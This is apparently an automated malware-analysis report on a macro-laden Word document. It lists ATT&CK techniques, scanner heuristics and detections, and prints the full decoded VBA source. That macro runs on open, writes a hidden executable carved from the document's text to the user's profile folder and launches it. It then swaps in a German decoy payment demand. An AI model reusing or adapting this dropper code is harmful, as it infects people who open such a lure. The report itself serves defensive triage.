MALICIOUS
336
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1071.001 Web Protocols
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen macro, and triggers heuristics related to shell execution and GetObject calls, indicating malicious intent. The document body explicitly instructs the user to enable content, a common lure for macro-based malware. The presence of the MSScriptControl.ScriptControl heuristic (CVE-2015-0097) suggests exploitation of a known vulnerability. The ClamAV detection 'Doc.Downloader.Generic-6698421-0' further supports its classification as a downloader.
Heuristics 14
-
MSScriptControl.ScriptControl — CVE-2015-0097 high CVE likely CVE_2015_0097_SCMSScriptControl.ScriptControl — CVE-2015-0097
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
SYDCcNp = Shell(MSWOjjpoaUUINq) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set HPerhoublMNTe = GetObject(, "word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Auto_Open -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
DntsTF = Environ("USERPROFILE") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5014 bytes |
SHA-256: 67621ebd522b9d12cf5e07ac7ce04b8759aa47aef839e9a01a33d84adb0954a9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FAE7E2F1-6DC8-430F-96EE-DA670CFAEB3E}{70BDEAE2-BBFD-4A3D-A59F-179F6ABE6BD9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NewMacros"
Sub HsQtneTenHy()
Word.ActiveDocument.Range.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Dim ijDXTPwxwFBJ As Word.Document
Set ijDXTPwxwFBJ = ThisDocument
ijDXTPwxwFBJ.Range.InsertParagraphAfter
ijDXTPwxwFBJ.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Rente (Datei Nr. : 51123944" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Zu bezahlen: 575,82 EUR" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Bezahlt: 0,00 EURRest: 575,82 EUR" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Rente (berechnet bis 28052014): 326,73 EUR" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "" + vbLf
ijDXTPwxwFBJ.Range.InsertAfter "Kosten: 162,46 EURZu bezahlen (totale balans) 1 065,01 EUR" + vbLf
End Sub
Sub ueXbodkxgDeiip()
Dim SYDCcNp As Integer
Dim lVqieckvfu As Paragraph
Dim MYMAQGywXqSxG As Integer
Dim iQjcdDF As String
Dim oLRRduZ As String
Dim YqZVrmFxshgDAAW As Boolean
Dim AdlObIICGc As Integer
Dim oiZqskXSUmsR As String
Dim DntsTF As String
Dim HaaopXuwrHpc As Long
Dim TZSmiCBQqxyrRRx As Byte
Dim cvkSUTaahRLgo As String
Dim OcmxOIVZ As String
oiZqskXSUmsR = "mxQBAotfGK"
oLRRduZ = "GssFip"
OcmxOIVZ = "exe"
uyZJhGXjbF = "."
iQjcdDF = oLRRduZ + uyZJhGXjbF + OcmxOIVZ
DntsTF = Environ("USERPROFILE")
ChDrive (DntsTF)
ChDir (DntsTF)
MYMAQGywXqSxG = FreeFile()
hBTedfQ
Debug.Print ("After OnTime: " & Now)
Dim ZRKLMKUgDCXZ As String
Dim RcNbqzguCPB As String
Dim VEyWMHiQHFYsdQ As String
Dim vaEQiTUK As Document
Dim PDEBoBKpo As String
Dim ioatxlofmB As ScriptControl
Set ioatxlofmB = UserForm1.ScriptControl1
ioatxlofmB.Language = "VBS" + "cript"
PDEBoBKpo = "ActiveDocument."
VEyWMHiQHFYsdQ = "Paragraphs"
RcNbqzguCPB = PDEBoBKpo + VEyWMHiQHFYsdQ
Set HPerhoublMNTe = GetObject(, "word.Application")
On Error GoTo oRtNHSnandIEo
ioatxlofmB.AddObject "Obj", HPerhoublMNTe
oRtNHSnandIEo:
For Each lVqieckvfu In ioatxlofmB.Eval("Obj." & RcNbqzguCPB)
QLHCAYVHZmxSI (lVqieckvfu)
cvkSUTaahRLgo = lVqieckvfu.Range.Text
Debug.Print ("After OnTime: " & Now)
If (YqZVrmFxshgDAAW = True) Then
HaaopXuwrHpc = 1
Dim ZPVLdKPjZO As Integer
ZPVLdKPjZO = 4
While (HaaopXuwrHpc < Len(cvkSUTaahRLgo))
TZSmiCBQqxyrRRx = Mid(cvkSUTaahRLgo, HaaopXuwrHpc, ZPVLdKPjZO)
Debug.Print ("After OnTime: " & Now)
Put #MYMAQGywXqSxG, , TZSmiCBQqxyrRRx
HaaopXuwrHpc = HaaopXuwrHpc + ZPVLdKPjZO
Wend
ElseIf (InStr(1, cvkSUTaahRLgo, oiZqskXSUmsR) > 0 And Len(cvkSUTaahRLgo) > 0) Then
Dim hSxQJdITnIUBFV As Boolean
hSxQJdITnIUBFV = True
YqZVrmFxshgDAAW = hSxQJdITnIUBFV
End If
Next
Close #MYMAQGywXqSxG
jCYZAgTRm (iQjcdDF)
End Sub
Sub jCYZAgTRm(MSWOjjpoaUUINq As String)
Dim SYDCcNp As Integer
Dim DntsTF As String
DntsTF = Environ("USERPROFILE")
ChDrive (DntsTF)
ChDir (DntsTF)
Debug.Print ("After OnTime: " & Now)
SYDCcNp = Shell(MSWOjjpoaUUINq)
HsQtneTenHy
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
ueXbodkxgDeiip
End Sub
Sub hBTedfQ()
Dim iQjcdDF As String
Dim MYMAQGywXqSxG As Integer
Dim OcmxOIVZ As String
Dim oLRRduZ As String
Dim uyZJhGXjbF As String
oLRRduZ = "GssFip"
uyZJhGXjbF = "."
OcmxOIVZ = "exe"
iQjcdDF = oLRRduZ + uyZJhGXjbF + OcmxOIVZ
MYMAQGywXqSxG = FreeFile()
Open iQjcdDF For Binary As MYMAQGywXqSxG
End Sub
Sub QLHCAYVHZmxSI(UgbFOAvRTct)
DoEvents
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.